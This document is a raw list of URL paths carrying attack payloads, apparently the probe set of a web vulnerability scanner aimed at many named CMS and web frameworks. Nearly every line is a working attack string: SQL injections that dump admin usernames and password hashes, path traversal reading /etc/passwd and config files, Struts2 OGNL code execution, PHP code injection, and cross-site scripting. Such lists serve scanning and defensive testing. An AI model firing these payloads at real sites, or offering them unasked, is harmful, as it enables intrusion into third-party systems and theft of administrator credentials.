/member/ajax_membergroup.php?action=post&membergroup=@%60'%60%20Union%20select%20concat(0x3336307765627363616e,pwd,0x7c)%20from%20%60%23@__admin%60%20where%201%20or%20id=@%60'%60
/register.php?do=submit
/management/login.asp
/index.php?-dauto_prepend_file%3d/etc/passwd+-n
/tools/ajax.aspx
/show.php?id=10%20and%201=2%20union%20select%201,2,concat(adminname,0x7c,adminpass,0x7c,CHAR(51,54,48,119,101,98,115,99,97,110)),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20eaea_admin%20limit%201
/admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from%205u_Admin&id=1%20and%201=2%20UNION%20select%201%20from%205u_Admin
/bom.php?dir=.
/phpsso_server/api/uc.php?code=dec0Hfdu%2Fkh7g9qSMqxHkpAOUSB7uMJ2pqcxZm6kkdY0xAqAbUaqV3noA56dIyd908KlMSyij9SKQQ3U2gU5uHdUbLHh%2BF7ZnA3mVL2sjK5zXGI
/myly.aspx?username=test'%20and%20@@version%3E0--
/go.php?a=/go.php/component/1&elements[tips]=%3C%21--%20php%20--%3E%3C%21--%20print(md5(base64_decode(MzYwd2Vic2Nhbg)))%3B%20--%3E%3C%21--%20%2Fphp%20--%3E
/?product-gnotify
/Index.action
/index.action
/login.action
/index.php/api/xmlrpc
/CVS/Root
/mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20%7Bpre%7Dadmin
/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
/index.php?m=search&a=public_get_suggest_keyword&url=http://www.baidu.com/&q=/../robots.txt
/plugin.php?id=Network114:Network114&ljtype=1%bf%27
/group/group.php?id=1%27webscan_draGxn
/dealfunc/comment_js.php?cmid=1%20order%20by%2030--webscan_draGxn
/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+%60phpcmsv9%60.v9_admin+Order+by+userid+limit+0,1)+)+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+'1'%3D'1
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/?/home/explore/category-1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/category/1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/upload/flow.php?step=update_cart
/user.php?act=is_registered&username=%CE%27360webscan%23
/do/api/uc.php?code=0bafU3yf6F7GsKqf3iZb1mSEZGreWpWlgHPE7DZRfkxE%2BOKOacQgl4JLy%2FS389F7qVCajFQ0xuDo1y6UUvt3NoR85dpBZd%2BdSNT7PaI
/do/api/uc.php?code=3313Q1ueQOU%2B1vFFJiosRu1wjJh0TPNrnivmg700mcfy4aJR3QChRsLmasXzCBnypE%2BZ8Oj9hPTpwoVCmRCIcG4lFbZfMhTlmKdb7Sc
/zhuti/360webscan'
/js.php?sort=1&jssort=shop&where=%201=2%20/**/union/**/select/**/1,adminname,password,4,5/**/from/**/modoer_admin%23
/js.php?jssort=shop&sort=1&num=2&panels=a'+and/**/1=2/**/union%20select+1,sha1('360webscan'),3,4,5%23
/search.php?query=a';?%3E%3C?exit(sha1('360webscan'));?%3E&modelid=1%20or%202=2
/WEB-INF/web.xml
/api.php?action=File&ctrl=download&path=api.php
/?/people/360webscan?notification_id-360webscan'
/?tag=test'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1('360webscan'),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'1'='1
/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F
/down/class/index.php?myord=0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/admin/manageAPP.php
/index.php?m=poster&c=index&a=poster_click&id=1
/yp/web/index.php?userid=999999999999999999999999999999999999&menu=die(md5($_GET%5bscan%5d))%3b&scan=webscan
/?/search/ajax/search_result/search_type-all__q-360webscan'
/?/people/ajax/user_actions/uid-1__actions-1)%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20(1=1
/index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00
/api/datacall.php?type=user&by=360webscan&order=/**/&limit=1
/wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
/do/s_rpc.php
/new2/s_rpc.php
/video/s_rpc.php
/photo/s_rpc.php
/news/s_rpc.php
/plus/search.php?typeArr[2%27%20and%20@%60%5C%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28Select%20md5%280x7765627363616e%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
/page/html/?360webscan'.html
/Admin/sqlPlatform/operateSql.aspx
/respond.php?code=alipay&subject=0&out_trade_no=%00'order%20by%20010101010webscan%20--%20(
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%bf%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/php-ofc-library/ofc_upload_image.php?name=ed1e83f8d8d90aa943e4add2ce6a4cbf.txt
/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&username=360webscan&password=ooxx&quickforward=yes&handlekey=webscan360
/e/data/ecmseditor/infoeditor/epage/TranMedia.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranImg.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
http://ec2-72-44-41-82.compute-1.amazonaws.com/proxyres.php
/e/data/ecmseditor/infoeditor/epage/TranFlash.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/pf/ratemovie.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/pf/rate.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/plus/pf/rate.php?id=111%3D@%60%5C'%60+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+sha1(0x3336307765627363616e)),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+]=a
/index.php?ac=search&at=taglist&tagkey=a%2527
/wap/index.php?ac=search&at=taglist&tagkey=a%2527
/ckeditor/samples/sample_posteddata.php
/plus/carbuyaction.php?dopost=return&code=../../tags
/?cart-ajaxadd
/do/kindeditor.php?id=%bf%22;alert(1);//&style=&etype=
/index.php?ac=order&at=list
/ajax.php?act=verify_ecv&ecvsn=360scan&ecvpassword=webscan%27
/ajax.php?act=verify_ecv&ecvsn=360scan%27
/include/online.php?jsoncallback=%3Ciframe/onload=alert(/webscan/)%3E
/m.php?m=User&a=doLogin
/api.php?act=1&appname=../../core/html/pages/about.html%00
/ajax.php?act=check_field&field_name=user_name&field_data=webscan%27
/message.php?act=webscan'
/link.php?act=go&url=webscan.cn'
/showtopiclist.aspx?direct=0%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&forumid=-1&order=1&page=1&search=1&type=
/showtopiclist.aspx?direct=0&forumid=-1&order=1%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&page=1&search=1&type=
/include/dialog/config.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/plus/bshare.php?dopost=getcode&uuid=%22%20onload=alert%281%29//
/group/search.php?keyword=1%3Ciframe%20src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K%3E
/admin_aspcms/_content/_tag/aspcms_tag.asp
/admin_aspcms/index.asp
/admin_aspcms/_style/aspcms_stylefun.asp?action=edit
/do/count.php?fid=1'%3E%22)%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(120,%20115,%20115))%3C/script%3E
/index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/member.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/resin-doc/viewfile/?file=index.jsp
/portal.php?diy=yes%22%3E%3C/ScRiPt%3E%3CScRiPt%3Ealert(/webscan/)%3C/ScRiPt%3E
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/api/uc_client/control/mail.php
/api.php?op=video_api&pc_hash=1&uid=1&snid=%3C/script%3E%3Cscript%3Ealert(/42873/)%3C/script%3E//&do_complete=1%20
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&field=%29%3C/script%3E%3Cscript%3Ealert%2842873%29%3C/script%3E//
/api.php?op=map&maptype=1&defaultcity=%e5%22;alert%28/42873/%29;//
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&api_key=%22%3E%3C/script%3E%3Cscript%3Ealert%28/42873/%29;%3C/script%3E
/api.php?op=map&maptype=1&city=test%3Cscript%3Ealert%28/42873/%29%3C/script%3E
/api.php?op=video_api&uid=1&snid=1&pc_hash=%3C/script%3E%3Cscript%3Ealert(/360/)%3C/script%3E//&do_complete=1
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/jiaoyou.php?pid=1'%20or%20@%60'%60%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,sha1(0x3336307765627363616e),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%20@%60'%60%20and%20'1'='1
/index.php/product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(0x7c,admin_name,0x7c,admin_pw,0x7c,sha1(0x3336307765627363616e))+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19%20and+'1'='1
/subscribe.php?act=dounsubscribe
/productbuy/checkout.asp?11_22.html
/data/%23data.asp
/manage/Config/BackupRestore.aspx
/install/index.php.bak?insLockfile=1
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=35
/?cart-addGoodsToCart.html
/install/index.php?step=active
/index.php?controller=block&action=spec_value_list&id=1%20union%20select%201,%28Select%20concat%280x5b,admin_name,0x3a,PassWord,0x5d%29%29,3,4,5,6%20from%20iwebshop_admin
/install/index.php?step=1&insLockfile=1
/plus/ajax_officebuilding.php?act=key&key=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,2,3,md5(1122),5,6,7,8,9%23
/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,md5(1122),3%20fr%3C%3Eom%20qs_admin%23
/plus/ad_js.php?aid=1&nocache=1
/admin.php
/resume/?key=xxxx%bf%22;alert(360);//
/register.php?do=check
/about/?module=../robots.txt&fmodule=7
/plus/Promotion.asp
/besthr/index.php?type=1%20and%20@%60%5C'%60%20or%20ascii(substring((select%20a_user%20from%20job_admin),1,1))=97%20%23@%60%5C'%60
/index.php?controller=site&action=getProduct&specJSON=%7B%20%22people%22:%221'%20and%201=2%20union%20select%20md5(1122),2,3,4,5,6,7,8,9%20and%20'1'='1%22%7D
/admin/admin_audit.php?status=1%27%29;phpinfo%28%29;//
/index.php?m=announcement&s=admin/notice
/item/?c-5,key-1'.html
/admin/fileopen.asp?filename=../index.asp
/cache/bak_mysql.txt
/index.php?case=archive&act=search&keyword=webscan%25%2527%29%09union%09select%090%2C0%2C0%2Cconcat%28username%2Cpassword%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%09from%09cmseasy_user%09where%09groupid%3D2%09union%09SELECT%09*%09FROM%09%60cmseasy_archive%60%09WHERE%09%28title%09like%09%2527%25aaaaaaaa
/api.php?act=../../robots.txt%00:template_info&api_version=1.0&app=12
/product-xxx-%3Cscript%20language=%22php%22%3Eecho%20%22webscan%22;-_set_compile.html
/user.php?back_act=http://127.0.0.1%22style=x:expression(alert(42873))%3E
/article_cat.php?id=12
/passport-verify.html
/user/userzone/School/download.aspx?f=/config/ConnectionStrings.config
/ajax.php?action=letter&letter=a&moduleid=1//***/union//***/select//***/1,2,concat(username,0x7c,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23//***/from//***/destoon_member//***/where//***/groupid=1//***/limit//***/0,1%23
/statistics.php?referer=http://www.google.com/search?q=a%2527),(null,null,null,null,null,null,null,null,(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20concat(user_name,0x7c,password)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b))%23&b=c&pageurl=1
/inquiry.php?action=inquiry
/install/index.php?_m=frontpage&_a=check
/api.php?act=get_spec_single&api_version=3.1
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/api.php?act=get_product_detail_info&api_version=3.1
/api.php?act=get_products_list&api_version=3.1
/?tools-products.html
/index.php?case=admin&act=login&admin_dir=admin&site=default
/index.php?case=user&act=space&mid=1
/?mod=wap&code=coupon_input&msgcode=ops-success&last[]==1%20union%20/*!select*/%201,1,1,1,1,1,1,1234567890,1%20from%20cenwor_system_members
/ajax.php?mod=check&code=email&email=a%2527%2bor%2b%28role_id%3D2%2band%2bascii%28substring%28%252756789%2527%2bfrom%2b2%29%29%3D54%29%2bor%2b%25272%2527%3D%25271&submit=
/index.php?m=company&s=space_comments&uid=1and%20(SELECT%201%20from%20(selectcount(*),concat(floor(rand(0)*2),(substring((select(selEctconcat(user,0x7c,password)%20from%20b2bbuilder_admin%20limit%200,1)),1,62)))a%20frominformation_schema.tables%20group%20by%20a)b)
/index.php?m=Order&a=index
/index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)-%3EgetAreaList();print(md5(1122));%23
/api/search.php?moduleid=5
/item.php?act=ajax&do=subject&op=get_membereffect
/include/global/showmod.php?id=9&dbname=met_admin_table%20where%20length(admin_pass)=32--%201
/include/hits.php?met_hits=met_download%20cross%20join%20met_admin_table%20where%20met_download.id=met_admin_table.id%20and%20length(admin_pass)=32%20--%201
/do/fujsarticle.php?type=like&FileName=../data/8137572f3849aabdwebscan.php&submit=check
/?app=vote&controller=vote&action=total&contentid=1%20and%20cast(ascii(substring(version(),1,1))=53%20as%20signed)
/?case=manage&act=guestadd&manage=archive&guest=1
/article.php?act=list&catid=0&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,schema_name,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
/phpsso_server/api.php?op=install&username=phpcms&password=reer&url=123&name=123&authkey=123&apifilename=123&charset=123&type=123&synlogin=123
/u.php/member-login?id=header_login%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%2842873%29%3C/ScRiPt%3E&style=1
/index.php/cms/item-comment?callback=jsonp1380096883458'%22()%26%25%3Cscript%3Eprompt(42873)%3C/script%3E&iid=114&page=1&view_page=1&_=1380096883791&_ajax_request=
/misc.php?mod=syscode&pnumber=C%27%20or%20%60%27%60%20%20or%20@%60%27%27%60%20union%20select%201%20from%20%28select%20count%28*%29,concat%28%28select%20database%28%29%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%20%23%20@%60%27%60
/general/reportshop/utils/ExecUserDefFormulas.php?formulas=%3C?php%20echo%20md5('webscan');exit();?%3E
/jcms/m_5_1/attach_dwn.jsp?filename=passwd&fpath=/etc/passwd
/member.php?act=login&op=forget&rand=U7183
/mobile/goods_list.php?type=1s'%20onmouseover=alert(/ed1e83f8d8d90aa943e4add2ce6a4cbf/)%20//
/bocadmin/j/uploadify.php
/index.php?app=main&func=common&action=upFile&act=upforhtmleditor
/lib/upload/upload.php
/jcms/setup/publishadmin.jsp
/jcms/workflow/sys/que_dictionary.jsp?que_keywords=1'%20and%20'1'='1%20
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/index.php?app=user&ac=../../../robots.txt%00
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=2&class_id_1=8&pconsume=&orderby=person_consume&sort=,(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/index.php?app=/../robots.txt%00
/utility/convert/index.php
/utility/convert/data/config.inc.php
/install/svinfo.php
/posthistory.php?tel=IiBhbmQoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KChzZWxlY3QgKHNlbGVjdCAoU0VMRUNUIENIQVIoMTAwLCA1NiwgMTAwLCA1NywgNDgsIDk3LCA5NywgNTcsIDUyLCA1MSwgMTAxLCA1MiwgOTcsIDEwMCwgMTAwLCA1MCkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
/wap/index.php?mod=login&action=login
/wap/index.php?keywords='and((select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))and'&mod=search&page=2
/cart.php
/api.php?act=set_shopex_conf&api_version=5.0
/report/reportServlet?action=4&url=http://127.0.0.1&file=wait_trace.raq&columns=0&srcType=file&width=-1&height=-1&cachedId=A_2&t_i_m_e=&frame=stu_saveAs_frame--%3E%3C/sCrIpT%3E%3CsCrIpT%3Ealert(42873)%3C/sCrIpT%3E
/user.php?act=signin
/CompHonorBig.asp?id=44%20and%201=12%20%20union%20select%201,'webscan',3,4,5%20from%20admin
/admin_aspcms/_content/_Comments/AspCms_TabAdd.asp
/Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin
/ProductShow.asp?ID=98%20and%201=1%20union%20select%201,'webscan',3,4,5,55221122,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin
/DownloadShow.asp
/NewsClass.asp
/plug/collect/AspCms_CollectFun.asp?action=getlinklist&todo=this&CollectID=1%20and%20%202=iif((1=1),2,chr(97))
/index.php?case=tag&act=show&tag=%2522%20union%20select%200x2D3120756E696F6E2073656C65637420312C307833313239323037353645363936463645323037333635364336353633373432303331324333323243333332433644363433353238333533353332333233313331333233323239324333353243333632433337324333383243333932433331333032433331333132433331333232433331333332433331333432433331333532433331333632433331333732433331333832433331333932433332333032433332333132433332333232433332333332433332333432433332333532433332333632433332333732433332333832433332333932433333333032433333333132433333333232433333333332433333333432433333333532433333333632433333333732433333333832433333333932433334333032433334333132433334333232433334333332433334333432433334333532433334333632433334333732433334333832433334333932433335333032433335333132433335333232433335333332433335333432433335333532433335333632433335333732433335333832303636373236463644323036333644373336353631373337393546373537333635373232332C332D2D,2%23
/Search.asp?GetType=MainInfo&SubSys=SD&Keyword=1&s_area=1%20union%20select%20df3342ecbf86e257()
/temp/compiled/pages.lbi.php/%22%3C/form%3E%3CsCripT%3Ealert(42873)%3C/scRipt%3E
/api.php?act=search_dly_type&api_version=1.0
/api/uc.php?code=e58bJh4lGn7%2F87F38CD3nphwoQNenQoOElYFu9%2FBvZV2gsgxPnmRmq3iJZcx%2FF1LPelzduVe3ZFJOD4Y0vpB388niaie8ECa%2FYA%2BqA13TPGzW5EpO%2FHaShEiHdaEqgyeRf%2Bh1EBCq3UASAPet%2BTI4R8tIKfU05ENmo5bK8Fj6DHvC9%2BtIksTeaOgmBzDwHdMbbLQwjGtvauIjUNnf2FglhdFD3mQdDiOq2rSSWxWPkQEYV0Z5ihe2YhVrmUlAVJqSshZ3wh5zdfjWzCUnP4I7k3f%2B2khp64tgUEbwIdcoV38Ei47PSd5h02j9uBvIs7yg%2ByfJ7zp5ArNiq3wuDcy9LtAXup68g
/?m=vote&id=&vid=1,3)%20and%20%20webscan1122%23
/aboutus.php?type=1'and%20(select%201%20from%20(select%20count(*),concat(md5(521122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/lostpass.php?md5=3&userid=-1'%20and%20(select%201%20from%20(select%20count(*),concat(md5(55221122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/index.php?m=message&s=inquiry_basket
/index.php?m=message&s=inquire&userid=1)%20UnIon%20select%201,12,123%20from%20webscan%23
/index.php?m=announcement&s=admin/notice_manager&action=modify&id=1212%20UnIon%20select%201,2,concat(user,0x7c,password),4,5,6,7,8%20from%20webscan%23
/index.php?m=company&s=space_mail&tid=1)%20and%201=websec%20%23
/index.php?m=company&s=admin/exportexcel&ordrby=user%20and%201=websec%23
/index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20websec)
/notes.php?action=view&nid=1-websec
/?mod=account&code=Sendcheckmail&uname=-1%2527%20or%201=1%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?UNAME=reer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/Search.asp
/suggestwordList.php?searchWord=a&language=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20md5(1122)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)
/ProductBuy.asp?UpdateOrder=%E6%9B%B4%E6%96%B0%E9%80%89%E6%8B%A9
/cycle_image.php?language=999%20union%20select%201,2,3,(select%20md5(1122)%20from%20nitc_user%20limit%200,1),5,file,7,8,9,0,1%20from%20nitc_ad%23%5Een
/download.php?tfile=%5C..%5C..%5Cconfig.php
/plugins/phpdisk_client/passport.php?YWN0aW9uPXBhc3Nwb3J0bG9naW4mdXNlcm5hbWU9MSZwYXNzd29yZD0xJnNpZ249NjdBMTAwNDc5QTQ4OTMyOUEzMTIxRUM0QTM2M0FBNzcmdHBmPXBkX3VzZXJzIHdoZXJlIGdpZD0xIGFuZCAoYXNjaWkoc3Vic3RyaW5nKChzZWxlY3QgdXNlcm5hbWUgZnJvbSBwZF91c2VycyB3aGVyZSBnaWQ9MSBsaW1pdCAwLDEpLDEsMSkpPTk4KSBsaW1pdCAwLDEj
/api.php?act=search_sub_regions&api_version=1.0
